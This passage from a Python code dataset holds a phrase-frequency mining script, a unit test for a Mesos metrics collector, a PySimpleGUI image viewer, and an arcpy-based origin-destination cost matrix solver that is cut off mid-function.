tqdm(word_4.items()):\r\n\r\n for k5,v5 in word_5.items():\r\n if k4 in k5 :\r\n word_4[k4] = v4-v5\r\n\r\n for k6,v6 in word_6.items():\r\n if k4 in k6 :\r\n word_4[k4] = v4-v6\r\n\r\n for k7,v7 in word_7.items():\r\n if k4 in k7 :\r\n word_4[k4] = v4-v7\r\n\r\n\r\n# 对字长为5的序列操作\r\nfor k5, v5 in tqdm(word_5.items()):\r\n\r\n for k6,v6 in word_6.items():\r\n if k5 in k6 :\r\n word_5[k5] = v5-v6\r\n\r\n for k7,v7 in word_7.items():\r\n if k5 in k7 :\r\n word_5[k5] = v5-v7\r\n\r\n\r\n# 对字长为6的序列操作\r\nfor k6, v6 in tqdm(word_6.items()):\r\n\r\n for k7,v7 in word_7.items():\r\n if k6 in k7 :\r\n word_6[k6] = v6-v7\r\n\r\n\r\n\r\n\r\n\r\n\r\nKs = []\r\nVs = []\r\nfor k, v in tqdm(word_2.items()):\r\n if v > 100:\r\n Ks.append(k)\r\n Vs.append(v)\r\n\r\nfh_2.write('\\n')\r\nfh_2.write(str(Ks))\r\nfh_2.write('\\n')\r\nfh_2.write(str(Vs))\r\nfh_2.write('\\n')\r\n\r\n\r\nKs = []\r\nVs = []\r\nfor k, v in tqdm(word_3.items()):\r\n if v > 100:\r\n Ks.append(k)\r\n Vs.append(v)\r\n\r\nfh_2.write('\\n')\r\nfh_2.write(str(Ks))\r\nfh_2.write('\\n')\r\nfh_2.write(str(Vs))\r\nfh_2.write('\\n')\r\n\r\n\r\nKs = []\r\nVs = []\r\nfor k, v in tqdm(word_4.items()):\r\n if v > 100:\r\n Ks.append(k)\r\n Vs.append(v)\r\n\r\nfh_2.write('\\n')\r\nfh_2.write(str(Ks))\r\nfh_2.write('\\n')\r\nfh_2.write(str(Vs))\r\nfh_2.write('\\n')\r\n\r\n\r\nKs = []\r\nVs = []\r\nfor k, v in tqdm(word_5.items()):\r\n if v > 100:\r\n Ks.append(k)\r\n Vs.append(v)\r\n\r\nfh_2.write('\\n')\r\nfh_2.write(str(Ks))\r\nfh_2.write('\\n')\r\nfh_2.write(str(Vs))\r\nfh_2.write('\\n')\r\n\r\n\r\nKs = []\r\nVs = []\r\nfor k, v in tqdm(word_6.items()):\r\n if v > 100:\r\n Ks.append(k)\r\n Vs.append(v)\r\n\r\nfh_2.write('\\n')\r\nfh_2.write(str(Ks))\r\nfh_2.write('\\n')\r\nfh_2.write(str(Vs))\r\nfh_2.write('\\n')\r\n\r\n\r\nKs = []\r\nVs = []\r\nfor k, v in tqdm(word_7.items()):\r\n if v > 100:\r\n Ks.append(k)\r\n Vs.append(v)\r\n\r\nfh_2.write('\\n')\r\nfh_2.write(str(Ks))\r\nfh_2.write('\\n')\r\nfh_2.write(str(Vs))\r\nfh_2.write('\\n')\r\n\r\n","sub_path":"Military_KG/phrase_mining/frequency_operation.py","file_name":"frequency_operation.py","file_ext":"py","file_size_in_byte":4707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"53571115","text":"#!/usr/bin/python\n# coding=utf-8\n\nfrom mock import Mock\nfrom mock import patch\n\nfrom test import CollectorTestCase\nfrom test import get_collector_config\nfrom test import unittest\nfrom diamond.collector import Collector\nfrom mesos import MesosCollector\n\n\nclass TestMesosCollector(CollectorTestCase):\n def setUp(self):\n config = get_collector_config('MesosCollector', {})\n\n self.collector = MesosCollector(config, None)\n\n def test_import(self):\n self.assertTrue(MesosCollector)\n\n def test_import(self):\n self.assertTrue(self.collector.config['path'], 'mesos')\n\n @patch.object(Collector, 'publish')\n def test_should_work_for_master_with_real_data(self, publish_mock):\n returns = self.getFixture('master_metrics_snapshot.json')\n urlopen_mock = patch('urllib2.urlopen', Mock(\n side_effect=lambda *args: returns))\n\n urlopen_mock.start()\n self.collector.collect()\n urlopen_mock.stop()\n\n # check how many fixtures were consumed\n self.assertEqual(urlopen_mock.new.call_count, 1)\n\n metrics = {\n 'master/elected': (1, 0),\n \"system/mem_free_bytes\": (5663678464.1, 0),\n \"registrar/state_store_ms/p9999\": (17.8412544, 6)\n }\n\n self.setDocExample(collector=self.collector.__class__.__name__,\n metrics=metrics,\n defaultpath=self.collector.config['path'])\n self.assertPublishedMany(publish_mock, metrics)\n\n @patch.object(Collector, 'publish')\n def test_should_work_for_slave_with_real_data(self, publish_mock):\n config = get_collector_config('MesosCollector', {'master': False})\n self.collector = MesosCollector(config, None)\n self.assertEqual(self.collector.master, False)\n\n returns = [\n self.getFixture('master_metrics_snapshot.json'),\n self.getFixture('slave_metrics_state.json'),\n self.getFixture('slave_monitor_statistics.json')\n ]\n\n urlopen_mock = patch('urllib2.urlopen', Mock(\n side_effect=lambda *args: returns.pop(0)))\n\n urlopen_mock.start()\n self.collector.collect()\n urlopen_mock.stop()\n\n # check how many fixtures were consumed\n self.assertEqual(urlopen_mock.new.call_count, 3)\n\n metrics = {\n 'master/elected': 1,\n 'system/mem_free_bytes': 5663678464.1,\n 'registrar/state_store_ms/p9999': (17.8412544, 6),\n 'staged_tasks': 20,\n 'started_tasks': 0,\n 'failed_tasks': 6,\n 'finished_tasks': 1,\n 'frameworks.marathon-0_7_6.executors' +\n '.task_name.cpus_limit': (1.7, 1),\n 'frameworks.marathon-0_7_6.executors.'\n 'task_name.instances_count': (2, 0),\n 'frameworks.marathon-0_7_6.executors.'\n 'com_domain_group_anotherApp.mem_mapped_file_bytes': 45056\n }\n\n self.setDocExample(collector=self.collector.__class__.__name__,\n metrics=metrics,\n defaultpath=self.collector.config['path'])\n self.assertPublishedMany(publish_mock, metrics)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"src/collectors/mesos/test/testmesos.py","file_name":"testmesos.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"341725693","text":"#img_viewer.py\r\n\r\nimport PySimpleGUI as sg\r\nimport os.path\r\n\r\n# ------------------------------ Layout elements ----------------------------- #\r\n\r\nfile_list_column = [\r\n [\r\n sg.Text(\"Image folder\"),\r\n sg.In( size = (25,1), enable_events = True, key = \"-FOLDER-\"),\r\n sg.FolderBrowse(),\r\n ],\r\n [\r\n sg.Listbox(\r\n values = [], enable_events=True, size = (40,20), key=\"-FILE LIST-\")\r\n ],\r\n ]\r\n\r\nimage_viewer_column = [\r\n [sg.Text(\"Choose an image from the list on the left : \")],\r\n [sg.Text(size=(40,1), key=\"-TOUT-\")],\r\n [sg.Image(key=\"-IMAGE-\")],\r\n ]\r\n\r\n# -------------------------------- Full layout ------------------------------- #\r\n\r\nlayout = [\r\n [\r\n sg.Column(file_list_column),\r\n sg.VSeparator(),\r\n sg.Column(image_viewer_column)\r\n ]\r\n ]\r\n\r\nwindow = sg.Window(\"Image viewer\", layout)\r\n\r\nwhile True :\r\n event, values = window.read() #Listen to any events in the window\r\n \r\n #Exit conditions\r\n if event == \"Exit\" or event == sg.WIN_CLOSED:\r\n break\r\n\r\n if event == \"-FOLDER-\":\r\n folder = values[\"-FOLDER-\"]\r\n try:\r\n #Getlist of files in folder\r\n file_list = os.listdir(folder)\r\n except:\r\n file_list = []\r\n fnames = [f for f in file_list if os.path.isfile(os.path.join(folder,f)) and\r\n f.lower().endswith((\".png\",\".gif\"))]\r\n window[\"-FILE LIST-\"].update(fnames)\r\n elif event == \"-FILE LIST-\":\r\n try :\r\n filename = os.path.join( values[\"-FOLDER-\"], values[\"-FILE LIST-\"][0])\r\n window[\"-TOUT-\"].update(filename)\r\n window[\"-IMAGE-\"].update(filename = filename)\r\n except :\r\n pass\r\nwindow.close()","sub_path":"Radar/Recherches/img_viewer.py","file_name":"img_viewer.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"91347122","text":"\"\"\"Compute Origin Destination (OD) cost matrix and save the output matrix as a feature class.\"\"\"\r\n\r\nfrom concurrent import futures\r\nimport os\r\nimport uuid\r\nimport logging\r\nimport shutil\r\nimport itertools\r\nimport time\r\nimport argparse\r\nfrom collections import namedtuple\r\n\r\nimport arcpy\r\n\r\n# Module level logger\r\nlogger = logging.getLogger(__name__) # pylint:disable=invalid-name\r\nlogger.addHandler(logging.NullHandler())\r\n\r\n\r\nclass ODCostMatrix: # pylint:disable = too-many-instance-attributes\r\n \"\"\"Solve a OD Cost Matrix problem.\"\"\"\r\n\r\n # Constants\r\n ORIGINS_OID_FIELD_NAME = \"OriginOID\"\r\n DESTINATIONS_OID_FIELD_NAME = \"DestinationOID\"\r\n MINUTES_TO_MILES = 1.6667 # Travel speed of 100 miles per hour.\r\n SEARCH_TOL = \"5 Miles\" # Distance to search for locations of the inputs on the street network. (~5km)\r\n OD_LINE_SHAPE = \"NO_LINES\" # shape type for the od lines\r\n\r\n def __init__(self, **kwargs):\r\n \"\"\"Set up names used in other methods.\"\"\"\r\n # Store keyword args as instance attributes\r\n self.origins = kwargs[\"origins\"]\r\n self.destinations = kwargs[\"destinations\"]\r\n self.network_data_source = kwargs[\"network_data_source\"]\r\n self.travel_mode = kwargs[\"travel_mode\"]\r\n self.output_folder = kwargs[\"output_folder\"]\r\n self.destination_count = kwargs.get(\"destination_count\", None)\r\n self.cutoff = kwargs.get(\"cutoff\", None)\r\n self.target_count = kwargs.get(\"target_count\", None)\r\n\r\n # Setup the class logger\r\n cls_logger = logging.getLogger(__name__)\r\n self.setup_logger(cls_logger)\r\n self.logger = cls_logger\r\n\r\n # other instance attributes\r\n self.portal_desc = kwargs.get(\"portal_description\", {})\r\n self.job_id = uuid.uuid4().hex\r\n self.job_folder = os.path.join(self.output_folder, self.job_id)\r\n self.pid = os.getpid()\r\n os.mkdir(self.job_folder)\r\n self.origins_sublayer = None\r\n self.destinations_sublayer = None\r\n self.lines_sublayer = None\r\n self.is_service = self.is_nds_service(self.network_data_source)\r\n self.time_attribute = \"\"\r\n self.distance_attribute = \"\"\r\n self.is_travel_mode_time_based = True\r\n self.input_origins_layer = \"InputOrigins\" + self.job_id\r\n self.input_destinations_layer = \"InputDestinations\" + self.job_id\r\n self.job_result = { # Store information about each OD cost matrix result\r\n \"jobId\": self.job_id,\r\n \"jobFolder\": self.job_folder,\r\n \"solveSucceeded\": False,\r\n \"solveMessages\": \"\",\r\n \"outputLines\": \"\",\r\n \"outputLayerFile\": \"\"\r\n }\r\n # Create a unique workspace that will contains inputs and outputs for OD cost matrix computation\r\n result = arcpy.management.CreateFileGDB(self.job_folder, \"scratch\")\r\n self.od_workspace = result.getOutput(0)\r\n\r\n # Create a network dataset layer\r\n self.nds_layer_name = \"NetworkDatasetLayer\"\r\n self._make_nds_layer()\r\n\r\n # Get the ObjectID fields for origins and destinations\r\n # Creates a describe object for a feature class\r\n desc_origins = arcpy.Describe(self.origins)\r\n desc_destinations = arcpy.Describe(self.destinations)\r\n # Setup the names of the OID fields and Name fields for the origins & Destinations\r\n self.origins_oid_field_name = desc_origins.oidFieldName\r\n # Field Name is specific to US ZIP Plus 4 dataset. Update for other Origins\r\n self.origins_name_field_name = \"ZIPPLUS4\"\r\n self.destinations_oid_field_name = desc_destinations.oidFieldName\r\n # Field name is specific to the Safegraph POI data set. Update for other Destinations\r\n self.destinations_name_field_name = \"safegraph_\"\r\n\r\n # Get the impedance, time impedance and distance impedance from the travel mode\r\n self._get_travel_mode_info()\r\n\r\n def solve_legacy(self, origins_criteria, # pylint:disable = too-many-locals, too-many-statements\r\n destinations_criteria):\r\n \"\"\"Generate a origin destination cost matrix using a network data source.\r\n\r\n Args:\r\n network_data_source: The network dataset layer or the portal URL for the network dataset source used to\r\n compute the origin destination cost matrix\r\n origins_criteria: A two value tuple representing the range of object ids for the origins to process.\r\n For example, to process origins with object id between 101 and 200, pass (101, 200)\r\n destinations_criteria: A two value tuple representing the range of object ids for the destinations to\r\n process. For example, to process destinations with object id between 101 and 200,\r\n pass (101, 200)\r\n\r\n \"\"\"\r\n # Set the workspace that will contains input and output NA classes used by OD Cost Matrix solver\r\n arcpy.env.workspace = self.od_workspace\r\n\r\n # Determine if we need to use the network dataset layer pointing to a local network dataset or a portal url as\r\n # our network data source. For a local network dataset, we also need to checkout the network analyst extension\r\n # license.\r\n if self.is_service:\r\n network_data_source = self.network_data_source\r\n else:\r\n network_data_source = self.nds_layer_name\r\n arcpy.CheckOutExtension(\"network\")\r\n\r\n # Create a new OD cost matrix layer\r\n self.logger.debug(\"Creating OD Cost Matrix layer\")\r\n result = arcpy.na.MakeODCostMatrixAnalysisLayer(network_data_source, travel_mode=self.travel_mode,\r\n cutoff=self.cutoff, line_shape=self.OD_LINE_SHAPE,\r\n number_of_destinations_to_find=self.target_count,\r\n accumulate_attributes=[self.time_attribute,\r\n self.distance_attribute])\r\n od_layer = result.getOutput(0)\r\n\r\n # Get the names of all the sublayers within the OD cost matrix layer.\r\n sublayer_names = arcpy.na.GetNAClassNames(od_layer)\r\n # Stores the layer names that we will use later\r\n origins_layer_name = sublayer_names[\"Origins\"]\r\n destinations_layer_name = sublayer_names[\"Destinations\"]\r\n\r\n # Select the origins and destinations to process\r\n self._select_inputs(origins_criteria, destinations_criteria)\r\n\r\n # Map the ObjectID field from input origin to the Name field on the origins sub layer and the ObjectID field\r\n # from input destinations to the Name field on the destinations sub layer. Map the network locations fields\r\n # using field mappings.\r\n origins_field_mappings = arcpy.na.NAClassFieldMappings(od_layer, origins_layer_name, True,\r\n arcpy.ListFields(self.input_origins_layer))\r\n # origins_field_mappings[\"Name\"].mappedFieldName = self.origins_oid_field_name\r\n origins_field_mappings[\"Name\"].mappedFieldName = self.origins_name_field_name\r\n destinations_field_mappings = arcpy.na.NAClassFieldMappings(od_layer, destinations_layer_name, True,\r\n arcpy.ListFields(self.input_destinations_layer))\r\n # destinations_field_mappings[\"Name\"].mappedFieldName = self.destinations_oid_field_name\r\n destinations_field_mappings[\"Name\"].mappedFieldName = self.destinations_name_field_name\r\n\r\n # Load the origins and destinations using the field mappings and a search tolerance of 20000 Meters.\r\n self.logger.debug(\"Loading origins and destinations\")\r\n arcpy.na.AddLocations(od_layer, origins_layer_name, self.input_origins_layer, origins_field_mappings,\r\n self.SEARCH_TOL, append=\"CLEAR\")\r\n arcpy.na.AddLocations(od_layer, destinations_layer_name, self.input_destinations_layer,\r\n destinations_field_mappings, self.SEARCH_TOL, append=\"CLEAR\")\r\n\r\n # Solve the OD cost matrix layer\r\n self.logger.debug(\"Solving OD cost matrix\")\r\n try:\r\n solve_result = arcpy.na.Solve(od_layer)\r\n except arcpy.ExecuteError:\r\n self.job_result[\"solveMessages\"] = arcpy.GetMessages()\r\n return\r\n self.job_result[\"solveSucceeded\"] = True\r\n self.job_result[\"solveMessages\"] = solve_result.getMessages()\r\n self.logger.debug(\"Solving OD cost matrix %s\", self.job_result[\"solveMessages\"].split(\"\\n\")[-1])\r\n lyr_file = os.path.join(self.job_folder, \"result_{}.lyrx\".format(self.job_id))\r\n self.job_result[\"outputLayerFile\"] = lyr_file\r\n arcpy.management.SaveToLayerFile(od_layer, lyr_file)\r\n\r\n # Get sublayers\r\n # listLayers returns a list of sublayer layer objects contained in the NA group layer, filtered by layer name\r\n # used as a wildcard. Use the sublayer name from GetNAClassNames as the wildcard string in case the sublayers\r\n # have non-default names.\r\n self.origins_sublayer = od_layer.listLayers(origins_layer_name)[0]\r\n self.destinations_sublayer = od_layer.listLayers(destinations_layer_name)[0]\r\n self.lines_sublayer = od_layer.listLayers(sublayer_names[\"ODLines\"])[0]\r\n\r\n # Transfer OIDs\r\n perf_start = time.perf_counter()\r\n self.logger.debug(\"Transferring OIDs from origins and destinations to OD lines\")\r\n self._transfer_oids()\r\n perf_end = time.perf_counter()\r\n self.logger.debug(\"Transferred OIDs in %.2f minutes\", (perf_end - perf_start) / 60)\r\n\r\n # Export the ODlines as output feature class\r\n self.job_result[\"outputLines\"] = self._export_od_lines()\r\n\r\n def solve(self, origins_criteria, # pylint:disable = too-many-locals, too-many-statements\r\n destinations_criteria):\r\n \"\"\"Generate a origin destination cost matrix using a network data source.\r\n\r\n Args:\r\n network_data_source: The network dataset layer or the portal URL for the network dataset source used to\r\n compute the origin destination cost matrix\r\n origins_criteria: A two value tuple representing the range of object ids for the origins to process.\r\n For example, to process origins with object id between 101 and 200, pass (101, 200)\r\n destinations_criteria: A two value tuple representing the range of object ids for the destinations to\r\n process. For example, to process destinations with object id between 101 and 200,\r\n pass (101, 200)\r\n\r\n \"\"\"\r\n # Set the workspace that will contains input and output NA classes used by OD Cost Matrix solver\r\n arcpy.env.workspace = self.od_workspace\r\n\r\n # Determine if we need to use the network dataset layer pointing to a local network dataset or a portal url as\r\n # our network data source. For a local network dataset, we also need to checkout the network analyst extension\r\n # license.\r\n if self.is_service:\r\n network_data_source = self.network_data_source\r\n else:\r\n network_data_source = self.nds_layer_name\r\n arcpy.CheckOutExtension(\"network\")\r\n\r\n # Create a new OD cost matrix layer\r\n self.logger.debug(\"Creating OD Cost Matrix object\")\r\n od_solver = arcpy.nax.OriginDestinationCostMatrix(network_data_source)\r\n # Solver object attributes that can be adjusted to suit\r\n # Change to set different distance units for the output OD matrix distance values\r\n od_solver.distanceUnits = arcpy.nax.DistanceUnits.Feet\r\n od_solver.allowSaveLayerFile = True\r\n # Travel mode requires both distance and time to be set\r\n od_solver.travelMode = self.travel_mode\r\n od_solver.defaultDestinationCount = self.target_count\r\n od_solver.defaultImpedanceCutoff = self.cutoff\r\n od_solver.accumulateAttributeNames = [self.time_attribute, self.distance_attribute]\r\n # No geometry is store which significantly increase speed\r\n if self.OD_LINE_SHAPE == \"NO_LINES\":\r\n od_solver.lineShapeType = arcpy.nax.LineShapeType.NoLine\r\n else:\r\n od_solver.lineShapeType = arcpy.nax.LineShapeType.StraightLine\r\n # self.SEARCH_TOL constant set to 5 Miles from original 20000 meters\r\n search_tol, search_tol_units = self.SEARCH_TOL.split()\r\n od_solver.searchTolerance = float(search_tol)\r\n od_solver.searchToleranceUnits = arcpy.nax.DistanceUnits[search_tol_units]\r\n\r\n # Select the origins and destinations to process\r\n self._select_inputs(origins_criteria, destinations_criteria)\r\n\r\n # Map the ObjectID field from input origin to the Name field on the origins sub layer and the ObjectID field\r\n # from input destinations to the Name field on the destinations sub layer. Map the network locations fields\r\n # using field mappings.\r\n origins_field_mappings = od_solver.fieldMappings(arcpy.nax.OriginDestinationCostMatrixInputDataType.Origins,\r\n True)\r\n # origins_field_mappings[\"Name\"].mappedFieldName = self.origins_oid_field_name\r\n origins_field_mappings[\"Name\"].mappedFieldName = self.origins_name_field_name\r\n destinations_field_mappings = od_solver.fieldMappings(\r\n arcpy.nax.OriginDestinationCostMatrixInputDataType.Destinations, # noqa pylint:disable=line-too-long\r\n True)\r\n # destinations_field_mappings[\"Name\"].mappedFieldName = self.destinations_oid_field_name\r\n destinations_field_mappings[\"Name\"].mappedFieldName = self.destinations_name_field_name\r\n\r\n # Load the origins and destinations using the field mappings and a search tolerance of 20000 Meters.\r\n self.logger.debug(\"Loading origins and destinations\")\r\n od_solver.load(arcpy.nax.OriginDestinationCostMatrixInputDataType.Origins, self.input_origins_layer,\r\n origins_field_mappings, False)\r\n od_solver.load(arcpy.nax.OriginDestinationCostMatrixInputDataType.Destinations, self.input_destinations_layer,\r\n destinations_field_mappings, False)\r\n\r\n # Solve the OD cost matrix layer\r\n self.logger.debug(\"Solving OD cost matrix\")\r\n solve_start = time.time()\r\n solve_result = od_solver.solve()\r\n solve_end = time.time()\r\n solve_msgs = \"\\n\".join([msg[-1] for msg in solve_result.solverMessages(arcpy.nax.MessageSeverity.All)])\r\n self.job_result[\"solveMessages\"] = solve_msgs\r\n if not solve_result.solveSucceeded:\r\n return\r\n self.job_result[\"solveSucceeded\"] = True\r\n self.logger.debug(\"Solving OD cost matrix completed in %s (seconds)\", round(solve_end - solve_start, 3))\r\n lyr_file = os.path.join(self.job_folder, \"result_{}.lyr\".format(self.job_id))\r\n self.job_result[\"outputLayerFile\"] = lyr_file\r\n solve_result.saveAsLayerFile(lyr_file)\r\n\r\n # Export the ODlines as output feature class\r\n output_od_lines = os.path.join(self.od_workspace, \"output_od_lines\")\r\n solve_result.export(arcpy.nax.OriginDestinationCostMatrixOutputDataType.Lines, output_od_lines)\r\n self.job_result[\"outputLines\"] = output_od_lines\r\n\r\n def _select_inputs(self, origins_criteria, destinations_criteria):\r\n \"\"\"Select origins and destinations to process.\"\"\"\r\n # Select the origins and destinations to process\r\n origins_where_clause = \"{} >= {} And {} <= {}\".format(self.origins_oid_field_name, origins_criteria[0],\r\n self.origins_oid_field_name, origins_criteria[1])\r\n arcpy.management.MakeFeatureLayer(self.origins, self.input_origins_layer, origins_where_clause)\r\n if self.cutoff:\r\n # select destinations within the cutoff from origins\r\n arcpy.management.MakeFeatureLayer(self.destinations, self.input_destinations_layer)\r\n cutoff = self.cutoff * self.MINUTES_TO_MILES if self.is_travel_mode_time_based else self.cutoff\r\n result = arcpy.management.SelectLayerByLocation(self.input_destinations_layer, \"WITHIN_A_DISTANCE_GEODESIC\",\r\n self.input_origins_layer, \"{} Miles\".format(cutoff), )\r\n # If no destinations are within the cutoff, skip this iteration\r\n if not result.getOutput(0).getSelectionSet():\r\n msg = \"No destinations found within the cutoff\"\r\n self.logger.warning(msg)\r\n self.job_result[\"solveMessages\"] = msg\r\n return\r\n else:\r\n\r\n destinations_where_clause = \"{} >= {} And {} <= {}\".format(self.destinations_oid_field_name,\r\n destinations_criteria[0],\r\n self.destinations_oid_field_name,\r\n destinations_criteria[1])\r\n arcpy.management.MakeFeatureLayer(self.destinations, self.input_destinations_layer,\r\n destinations_where_clause)\r\n\r\n def _get_travel_mode_info(self):\r\n \"\"\"Get additional info from the travel mode.\"\"\"\r\n # When working with services, get the travel modes defined in the portal\r\n if self.is_service:\r\n # travel_modes = self._get_portal_travel_modes()\r\n travel_modes = arcpy.na.GetTravelModes(self.network_data_source)\r\n else:\r\n travel_modes = arcpy.na.GetTravelModes(self.nds_layer_name)\r\n travel_mode = travel_modes[self.travel_mode]\r\n impedance = travel_mode.impedance\r\n self.time_attribute = travel_mode.timeAttributeName\r\n self.distance_attribute = travel_mode.distanceAttributeName\r\n self.is_travel_mode_time_based = True if self.time_attribute == impedance else False\r\n\r\n def _make_nds_layer(self):\r\n \"\"\"Create a network dataset layer if one does not exist.\"\"\"\r\n # Can only create a layer for a local network dataset\r\n if self.is_service:\r\n return\r\n if arcpy.Exists(self.nds_layer_name):\r\n self.logger.debug(\"Using existing network dataset layer: %s\", self.nds_layer_name)\r\n else:\r\n self.logger.debug(\"Creating network dataset layer\")\r\n arcpy.na.MakeNetworkDatasetLayer(self.network_data_source, self.nds_layer_name)\r\n\r\n def _transfer_oids_using_join(self):\r\n \"\"\"Transfer OIDs from origins and destinations sub layers to OD lines sub layer using attribute joins.\"\"\"\r\n # Add an attribute index to the OD lines feature class\r\n arcpy.management.AddIndex(self.lines_sublayer, \"OriginID\", \"OriginID\", \"NON_UNIQUE\", \"NON_ASCENDING\")\r\n arcpy.management.AddIndex(self.lines_sublayer, \"DestinationID\", \"DestinationID\", \"NON_UNIQUE\", \"NON_ASCENDING\")\r\n # Use the JoinField tool to transfer OD Cost Matrix information to the output feature class\r\n # Transfer the OriginOID from the input Origins to the output Lines\r\n arcpy.management.JoinField(self.lines_sublayer, \"OriginID\", self.origins_sublayer, \"ObjectID\",\r\n self.ORIGINS_OID_FIELD_NAME)\r\n # Transfer the DestinationOID field from the input Destinations to the output Lines\r\n arcpy.management.JoinField(self.lines_sublayer, \"DestinationID\", self.destinations_sublayer, \"ObjectID\",\r\n self.DESTINATIONS_OID_FIELD_NAME)\r\n\r\n def _transfer_oids(self):\r\n \"\"\"Calculate OIDs from name field.\"\"\"\r\n # Add OID fields\r\n arcpy.management.AddFields(self.lines_sublayer, [[self.ORIGINS_OID_FIELD_NAME, \"LONG\"],\r\n [self.DESTINATIONS_OID_FIELD_NAME, \"LONG\"]])\r\n # Calculate OID fields from the Name field\r\n with arcpy.da.UpdateCursor(self.lines_sublayer, (\"Name\", # pylint:disable = no-member\r\n self.ORIGINS_OID_FIELD_NAME,\r\n self.DESTINATIONS_OID_FIELD_NAME)) as cursor:\r\n for row in cursor:\r\n row[1], row[2] = map(int, row[0].split(\"-\"))\r\n cursor.updateRow(row)\r\n\r\n def _export_od_lines(self):\r\n \"\"\"Export OD lines to an output feature class.\r\n\r\n Returns:\r\n The full catalog path of the output feature class.\r\n\r\n \"\"\"\r\n self.logger.debug(\"Exporting OD lines\")\r\n travel_time_field_name = \"Total_{}\".format(self.time_attribute)\r\n travel_distance_field_name = \"Total_{}\".format(self.distance_attribute)\r\n fields_to_copy = (self.ORIGINS_OID_FIELD_NAME, self.DESTINATIONS_OID_FIELD_NAME, \"DestinationRank\",\r\n travel_time_field_name, travel_distance_field_name)\r\n field_mappings = arcpy.FieldMappings()\r\n for field in fields_to_copy:\r\n field_map = arcpy.FieldMap()\r\n field_map.addInputField(self.lines_sublayer, field)\r\n if field == travel_time_field_name:\r\n output_field = field_map.outputField\r\n output_field.name = \"Total_Time\"\r\n output_field.aliasName = \"Total Time\"\r\n field_map.outputField = output_field\r\n elif field == travel_distance_field_name:\r\n output_field = field_map.outputField\r\n output_field.name = \"Total_Distance\"\r\n output_field.aliasName = \"Total Distance\"\r\n field_map.outputField = output_field\r\n else:\r\n pass\r\n field_mappings.addFieldMap(field_map)\r\n\r\n result = arcpy.conversion.FeatureClassToFeatureClass(self.lines_sublayer, self.od_workspace, \"output_od_lines\",\r\n field_mapping=field_mappings)\r\n self.logger.debug(\"Exporting OD lines %s\", result.getMessages().split(\"\\n\")[-1])\r\n return result.getOutput(0)\r\n\r\n @staticmethod\r\n def get_nds_search_criteria(network_data_source): # pylint:disable = too-many-locals\r\n \"\"\"Return the search criteria for a network dataset that can be used with Calculate Locations GP tool.\r\n\r\n Args:\r\n network_data_source: The catalog path to the network dataset\r\n Returns:\r\n The search criteria for the netrwork dataset.\r\n\r\n \"\"\"\r\n # Determine if a network source defines subtypes. The search criteria needs to be specified for each subtype\r\n # using the following pattern [\"SourceName : subtype description\", \"SHAPE\"]\r\n tmp_search_criteria = []\r\n search_criteria = []\r\n nds_desc = arcpy.Describe(network_data_source)\r\n nds_fds_path = os.path.dirname(nds_desc.catalogPath)\r\n for src in nds_desc.sources:\r\n src_element_type = src.elementType\r\n if src_element_type not in (\"Edge\", \"Junction\"):\r\n continue\r\n src_name = src.name\r\n src_path = os.path.join(nds_fds_path, src_name)\r\n src_desc = arcpy.Describe(src_path)\r\n if src_desc.subTypeFieldName:\r\n # Get the description of subtype codes\r\n src_sub_types = arcpy.da.ListSubtypes(src_path) # pylint:disable = no-member\r\n for code in src_sub_types:\r\n sub_type_description = src_sub_types[code][\"Name\"]\r\n tmp_search_criteria.append([u\"{} : {}\".format(src_name, sub_type_description), src_element_type])\r\n else:\r\n tmp_search_criteria.append([src_name, src_element_type])\r\n # Set shape type for all edge sources to be SHAPE and NONE for all junction sources\r\n for criteria in tmp_search_criteria:\r\n shape_type = \"SHAPE\" if criteria[-1] == \"Edge\" else \"NONE\"\r\n search_criteria.append([criteria[0], shape_type])\r\n return search_criteria\r\n\r\n @staticmethod\r\n def preprocess_inputs(input_features, network_data_source, travel_mode, output_workspace):\r\n \"\"\"Preprocess input features so that they can be processed in chunks.\r\n\r\n The function performs tasks such as spatially sorting input features and calculate network locations for the\r\n features.\r\n\r\n Args:\r\n input_features: The full catalog path to the input feature class.\r\n network_data_source: The catalog path to the network dataset used for analysis\r\n travel_mode: Name of the travel mode used for the analysis.\r\n output_workspace: The catalog path of the output workspace in which to write the output feature class.\r\n Returns:\r\n The full catalog path of the processed feature class.\r\n\r\n \"\"\"\r\n logger.info(\"Preprocessing %s\", input_features)\r\n # Create output features in a feature class with the same name as input feature class.\r\n desc_input_features = arcpy.Describe(input_features)\r\n input_path = desc_input_features.catalogPath\r\n output_features = arcpy.CreateUniqueName(os.path.basename(input_path), output_workspace)\r\n\r\n # Spatially sort input features\r\n logger.debug(\"Spatially sorting %s\", input_features)\r\n result = arcpy.management.Sort(input_features, output_features,\r\n [[desc_input_features.shapeFieldName, \"ASCENDING\"]], \"PEANO\")\r\n logger.debug(result.getMessages().split(\"\\n\")[-1])\r\n # Calculate network location fields if network data source is local\r\n if not ODCostMatrix.is_nds_service(network_data_source):\r\n logger.debug(\"Calculating network locations for %s\", input_features)\r\n result = arcpy.na.CalculateLocations(output_features, network_data_source, \"20 Miles\",\r\n ODCostMatrix.get_nds_search_criteria(network_data_source),\r\n travel_mode=travel_mode)\r\n logger.debug(result.getMessages().split(\"\\n\")[-1])\r\n\r\n return output_features\r\n\r\n @staticmethod\r\n def get_oid_ranges(origins_count, destinations_count, max_od_size):\r\n \"\"\"Return an iterable of OIDs ranges for origins and destinations.\r\n\r\n Args:\r\n origins_count: Total number of origins.\r\n destinations_count: Total number of destinations.\r\n max_od_size: The maximum number of od lines that should be present in a single od cost matrix. This number\r\n governs how many origins and destinations are processed in one iteration. For example, if you\r\n have 500 origins and 100 destinations and maximum od size is 10,000, then each iteration will\r\n process 100 origins and 100 destinations.\r\n Returns:\r\n An iterable where each element is a tuple containing lower and upper bound OIDs for origins and\r\n destinations to process in each iteration. For example get_oid_ranges(200, 100, 10000) will return an\r\n iterable such as [((1, 100), (1, 100)), ((101, 200), (1, 100))]\r\n\r\n \"\"\"\r\n od_ranges = []\r\n if destinations_count <= max_od_size:\r\n max_origins = max_od_size // destinations_count\r\n origin_ranges = itertools.zip_longest(range(1, origins_count + 1, max_origins),\r\n range(max_origins, origins_count + 1, max_origins),\r\n fillvalue=origins_count)\r\n od_ranges = ((val, (1, destinations_count)) for val 